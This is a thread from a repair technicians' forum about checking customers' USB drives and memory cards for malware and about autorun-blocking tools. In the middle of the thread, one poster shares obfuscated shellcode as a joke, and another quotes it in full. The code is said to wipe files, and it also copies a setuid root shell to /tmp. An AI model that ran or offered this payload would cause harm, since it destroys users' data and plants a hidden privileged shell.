Don't forget the USB devices when removing malware

[rusty.nells]

I'll bet most of you know this already but for those that don't, check your customers USB devices when removing malware. These type of infections are becoming more prevalent.

You should always check the following:

USB hard drives
flash drives
memory cards
mp3 players
cameras
digital photo frames
any external and network storage devices
(did I forget anything?)

If your customer's computer gets re-infected by one of these devices soon after you've finished cleaning it, guess who gets the blame?

 

[Methical]

Yeah thats a good point, who would get the blame lol.
Even though you were only there to clean there PC, not every other kind of digital storage that there is.

In saying that, should a price be upped for checkin' all digital media? Should us as techs be asking the clients if they want all their digital media checked for malware/virii etc, and charging additional for it? Even though a 2GB drive would take a matter of seconds to scan..

 

[rusty.nells]

Has anyone tried Panda USB and AutoRun Vaccine? This might solve some of the problems with these USB devices. I just discovered this, haven't yet tried it.

Also posted as a Repair Tool of the Week Suggestion.

 

[Methical]

I wouldn't advise recommending a "Repair Tool of the Week" if you haven't yet tested it.

Its about as useful as me telling you to run this script on your UNIX system

char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
                = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
                  "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
                  "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
                  "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
                  "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
                  "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
                  "\x6e\x2f\x73\x68\x00\x2d\x63\x00"
                  "cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";

P.S
Please don't run that script on your UNIX system

 

[rusty.nells]

I wouldn't advise recommending a "Repair Tool of the Week" if you haven't yet tested it.

Point taken.

Although I did "immunize" a few USB sticks. It places a read-only autorun.inf on the drive. I tried to edit, copy and delete the file but was denied access.

The app itself is portable, no installation required. You can run it from a USB drive.

Now I need an infected machine

 

[thor999]

I wouldn't advise recommending a "Repair Tool of the Week" if you haven't yet tested it.

Its about as useful as me telling you to run this script on your UNIX system

char esp[] __attribute__ ((section(".text"))) /* e.s.p
release */
                = "\xeb\x3e\x5b\x31\xc0\x50\x54\x5a\x83\xec\x64\x68"
                  "\xff\xff\xff\xff\x68\xdf\xd0\xdf\xd9\x68\x8d\x99"
                  "\xdf\x81\x68\x8d\x92\xdf\xd2\x54\x5e\xf7\x16\xf7"
                  "\x56\x04\xf7\x56\x08\xf7\x56\x0c\x83\xc4\x74\x56"
                  "\x8d\x73\x08\x56\x53\x54\x59\xb0\x0b\xcd\x80\x31"
                  "\xc0\x40\xeb\xf9\xe8\xbd\xff\xff\xff\x2f\x62\x69"
                  "\x6e\x2f\x73\x68\x00\x2d\x63\x00"
                  "cp -p /bin/sh /tmp/.beyond; chmod 4755
/tmp/.beyond;";

P.S
Please don't run that script on your UNIX system

Allright we're curious, what will it do? Apart from that, how does one go about virus checking all USB devices, just have them all hooked up at the same time or what?

 

[SouthernTech]

It will destroy your home directory as a regular user, or all files as root.

Source: http://ubuntuforums.org/announcement.php?f=48

 

[Cambridge PC Support]

I read somewhere (probably here!) about creating a folder called autorun.inf which is harder to remove

haven't tried it myself, but intend to!

 

[usacvlr]

Not if they have thousands of files on it. Been there done that. One guy came in with a handful of the things one time.

Yeah thats a good point, who would get the blame lol.
Even though you were only there to clean there PC, not every other kind of digital storage that there is.

In saying that, should a price be upped for checkin' all digital media? Should us as techs be asking the clients if they want all their digital media checked for malware/virii etc, and charging additional for it? Even though a 2GB drive would take a matter of seconds to scan..

 

[gabak]

when customers comes with laptop or pc i ask for the pendrives and with UBUNTU i do the trick , i can easly remove all the autorun.inf in few seconds and problem solved .
Also i trying to migrate ppls windows to ubuntu and no more virus for life.

 

[studiot]

Real good point, Rusty. Thanks.